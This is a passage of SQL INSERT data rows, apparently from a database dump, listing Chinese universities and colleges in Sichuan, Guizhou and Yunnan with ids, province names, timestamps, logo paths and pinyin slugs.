17:40:38','/images/school/default.png','chengdugongyexueyuan',0,NULL,NULL,0,NULL,NULL),(1968,'攀枝花学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','panzhihuaxueyuan',0,NULL,NULL,0,NULL,NULL),(1969,'四川旅游学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanlvyouxueyuan',0,NULL,NULL,0,NULL,NULL),(1970,'四川民族学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanminzuxueyuan',0,NULL,NULL,0,NULL,NULL),(1971,'成都东软学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','chengdudongruanxueyuan',0,NULL,NULL,0,NULL,NULL),(1972,'四川传媒学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanchuanmeixueyuan',0,NULL,NULL,0,NULL,NULL),(1973,'成都师范学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','chengdushifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1974,'四川警察学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanjingchaxueyuan',0,NULL,NULL,0,NULL,NULL),(1975,'成都医学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','chengduyixueyuan',0,NULL,NULL,0,NULL,NULL),(1976,'阿坝师范学院','四川省','2014-04-23 00:00:00','2017-09-04 17:37:08','/images/school/default.png','abashifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1977,'成都纺织高等专科学校','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','chengdufangzhigaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1978,'民办四川天一学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','minbansichuantianyixueyuan',0,NULL,NULL,0,NULL,NULL),(1979,'四川幼儿师范高等专科学校','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1980,'川北幼儿师范高等专科学校','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','chuanbeiyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1981,'四川中医药高等专科学校','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanzhongyiyaogaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1982,'成都航空职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','chengduhangkongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1983,'四川工业科技学院','四川省','2014-04-23 00:00:00','2017-09-04 17:37:24','/images/school/default.png','sichuangongyeguanlizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1984,'四川艺术职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1985,'四川科技职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuankejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1986,'四川财经职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuancaijingzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1987,'四川城市职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanchengshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1988,'四川现代职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanxiandaizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1989,'四川长江职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanchangjiangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1990,'四川三河职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuansanhezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1991,'四川卫生康复职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanweishengkangfuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1992,'四川电影电视职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuandianyingdianshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1993,'四川汽车职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanqichezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1994,'巴中职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','bazhongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1995,'四川希望汽车职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanxiwangqichezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1996,'四川电子机械职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuandianzijixiezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1997,'四川文轩职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanwenxuanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1998,'四川电力职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuandianlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1999,'成都职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','chengduzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2000,'四川化工职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanhuagongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2001,'四川水利职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanshuilizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2002,'南充职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','nanchongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2003,'内江职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','neijiangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2004,'四川航天职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanhangtianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2005,'四川邮电职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanyoudianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2006,'四川机电职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanjidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2007,'绵阳职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','mianyangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2008,'四川交通职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanjiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2009,'四川工商职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuangongshangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2010,'四川工程职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuangongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2011,'四川建筑职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanjianzhuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2012,'达州职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','dazhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2013,'四川托普信息技术职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuantuopuxinxijishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2014,'四川国际标榜职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanguojibiaobangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2015,'成都农业科技职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','chengdunongyekejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2016,'宜宾职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','yibinzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2017,'泸州职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','luzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2018,'眉山职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','meishanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2019,'成都艺术职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','chengduyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2020,'四川职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2021,'乐山职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','leshanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2022,'雅安职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','yaanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2023,'四川商务职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanshangwuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2024,'四川司法警官职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuansifajingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2025,'广安职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guanganzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2026,'四川信息职业技术学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanxinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2027,'四川文化传媒职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanwenhuachuanmeizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2028,'四川华新现代职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanhuaxinxiandaizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2029,'四川管理职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanguanlizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2030,'四川文化产业职业学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanwenhuachanyezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2031,'贵州大学','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guizhoudaxue',0,NULL,NULL,0,NULL,NULL),(2032,'贵州师范大学','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guizhoushifandaxue',0,NULL,NULL,0,NULL,NULL),(2033,'贵州财经大学','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guizhoucaijingdaxue',0,NULL,NULL,0,NULL,NULL),(2034,'贵州民族大学','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guizhouminzudaxue',0,NULL,NULL,0,NULL,NULL),(2035,'贵阳医学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guiyangyixueyuan',0,NULL,NULL,0,NULL,NULL),(2036,'遵义医学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zunyiyixueyuan',0,NULL,NULL,0,NULL,NULL),(2037,'贵阳中医学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guiyangzhongyixueyuan',0,NULL,NULL,0,NULL,NULL),(2038,'遵义师范学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zunyishifanxueyuan',0,NULL,NULL,0,NULL,NULL),(2039,'铜仁学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','tongrenxueyuan',0,NULL,NULL,0,NULL,NULL),(2040,'兴义民族师范学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','xingyiminzushifanxueyuan',0,NULL,NULL,0,NULL,NULL),(2041,'安顺学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','anshunxueyuan',0,NULL,NULL,0,NULL,NULL),(2042,'毕节学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','bijiexueyuan',0,NULL,NULL,0,NULL,NULL),(2043,'凯里学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','kailixueyuan',0,NULL,NULL,0,NULL,NULL),(2044,'黔南民族师范学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','qiannanminzushifanxueyuan',0,NULL,NULL,0,NULL,NULL),(2045,'贵阳学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guiyangxueyuan',0,NULL,NULL,0,NULL,NULL),(2046,'六盘水师范学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','liupanshuishifanxueyuan',0,NULL,NULL,0,NULL,NULL),(2047,'贵州师范学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guizhoushifanxueyuan',0,NULL,NULL,0,NULL,NULL),(2048,'贵州理工学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guizhouligongxueyuan',0,NULL,NULL,0,NULL,NULL),(2049,'黔南民族医学高等专科学校','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','qiannanminzuyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2050,'贵州商学院','贵州省','2014-04-23 00:00:00','2017-09-04 17:37:40','/images/school/default.png','guizhoushangyegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2051,'贵阳幼儿师范高等专科学校','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guiyangyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2052,'铜仁幼儿师范高等专科学校','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','tongrenyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2053,'遵义医药高等专科学校','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zunyiyiyaogaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2054,'贵州工业职业技术学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guizhougongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2055,'贵阳职业技术学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guiyangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2056,'毕节职业技术学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','bijiezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2057,'贵州职业技术学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guizhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2058,'贵州盛华职业学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guizhoushenghuazhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2059,'贵州工商职业学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guizhougongshangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2060,'贵州警官职业学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guizhoujingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2061,'贵州交通职业技术学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guizhoujiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2062,'贵州航天职业技术学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guizhouhangtianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2063,'贵州电子信息职业技术学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guizhoudianzixinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2064,'安顺职业技术学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','anshunzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2065,'黔东南民族职业技术学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','qiandongnanminzuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2066,'黔南民族职业技术学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','qiannanminzuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2067,'遵义职业技术学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zunyizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2068,'贵州亚泰职业学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guizhouyataizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2069,'贵州电力职业技术学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guizhoudianlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2070,'六盘水职业技术学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','liupanshuizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2071,'铜仁职业技术学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','tongrenzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2072,'黔西南民族职业技术学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','qianxinanminzuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2073,'贵州轻工职业技术学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guizhouqinggongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2074,'贵阳护理职业学院','贵州省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guiyanghulizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2075,'云南大学','云南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','yunnandaxue',0,NULL,NULL,0,NULL,NULL),(2076,'昆明理工大学','云南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','kunmingligongdaxue',0,NULL,NULL,0,NULL,NULL),(2077,'云南农业大学','云南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','yunnannongyedaxue',0,NULL,NULL,0,NULL,NULL),(2078,'西南林业大学','云南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','xinanlinyedaxue',0,NULL,NULL,0,NULL,NULL),(2079,'昆明医科大学','云南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','kunmingyikedaxue',0,NULL,NULL,0,NULL,NULL),(2080,'云南师范大学','云南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','yunnanshifandaxue',0,NULL,NULL,0,NULL,NULL),(2081,'云南财经大学','云南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','yunnancaijingdaxue',0,NULL,NULL,0,NULL,NULL),(2082,'云南民族大学','云南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','yunnanminzudaxue',0,NULL,NULL,0,NULL,NULL),(2083,'大理大学','云南省','2014-04-23 00:00:00','2017-09-04 17:54:01','/images/school/default.png','dalixueyuan',0,NULL,NULL,0,NULL,NULL),(2084,'云南中医学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','yunnanzhongyixueyuan',0,NULL,NULL,0,NULL,NULL),(2085,'昆明学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','kunmingxueyuan',0,NULL,NULL,0,NULL,NULL),(2086,'昭通学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhaotongxueyuan',0,NULL,NULL,0,NULL,NULL),(2087,'曲靖师范学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/2087.png','qujingshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(2088,'普洱学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','puerxueyuan',0,NULL,NULL,0,NULL,NULL),(2089,'保山学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','baoshanxueyuan',0,NULL,NULL,0,NULL,NULL),(2090,'红河学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','honghexueyuan',0,NULL,NULL,0,NULL,NULL),(2091,'云南艺术学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/2091.png','yunnanyishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2092,'玉溪师范学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','yuxishifanxueyuan',0,NULL,NULL,0,NULL,NULL),(2093,'楚雄师范学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','chuxiongshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(2094,'云南警官学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','yunnanjingguanxueyuan',0,NULL,NULL,0,NULL,NULL),(2095,'文山学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','wenshanxueyuan',0,NULL,NULL,0,NULL,NULL),(2096,'云南工商学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnangongshangxueyuan',0,NULL,NULL,0,NULL,NULL),(2097,'昆明冶金高等专科学校','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','kunmingyejingaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2098,'曲靖医学高等专科学校','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','qujingyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2099,'楚雄医药高等专科学校','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','chuxiongyiyaogaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2100,'保山中医药高等专科学校','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','baoshanzhongyiyaogaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2101,'丽江师范高等专科学校','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','lijiangshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2102,'德宏师范高等专科学校','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','dehongshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2103,'临沧师范高等专科学校','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','lincangshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2104,'云南城市建设职业学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnanchengshijianshezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2105,'云南工程职业学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnangongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2106,'云南锡业职业技术学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnanxiyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2107,'云南经贸外事职业学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnanjingmaowaishizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2108,'云南三鑫职业技术学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnansanxinzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2109,'德宏职业学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','dehongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2110,'云南商务职业学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnanshangwuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2111,'昆明卫生职业学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','kunmingweishengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2112,'云南现代职业技术学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnanxiandaizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2113,'云南旅游职业学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnanlvyouzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2114,'红河卫生职业学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','hongheweishengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2115,'云南外事外语职业学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnanwaishiwaiyuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2116,'大理农林职业技术学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','dalinonglinzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2117,'云南国土资源职业学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnanguotuziyuanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2118,'云南交通职业技术学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnanjiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2119,'昆明工业职业技术学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','kunminggongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2120,'云南农业职业技术学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnannongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2121,'云南司法警官职业学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnansifajingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2122,'云南文化艺术职业学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnanwenhuayishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2123,'云南体育运动职业技术学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnantiyuyundongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2124,'云南经济管理学院','云南省','2014-04-23 00:00:00','2017-09-04 17:54:17','/images/school/default.png','yunnanjingjiguanlizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2125,'云南科技信息职业学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnankejixinxizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2126,'西双版纳职业技术学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xishuangbannazhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2127,'昆明艺术职业学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','kunmingyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2128,'玉溪农业职业技术学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yuxinongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2129,'云南能源职业技术学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnannengyuanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2130,'云南热带作物职业学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnanredaizuowuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2131,'云南国防工业职业技术学院','云南省','2014-04-23 00:00:00','2015-10-16 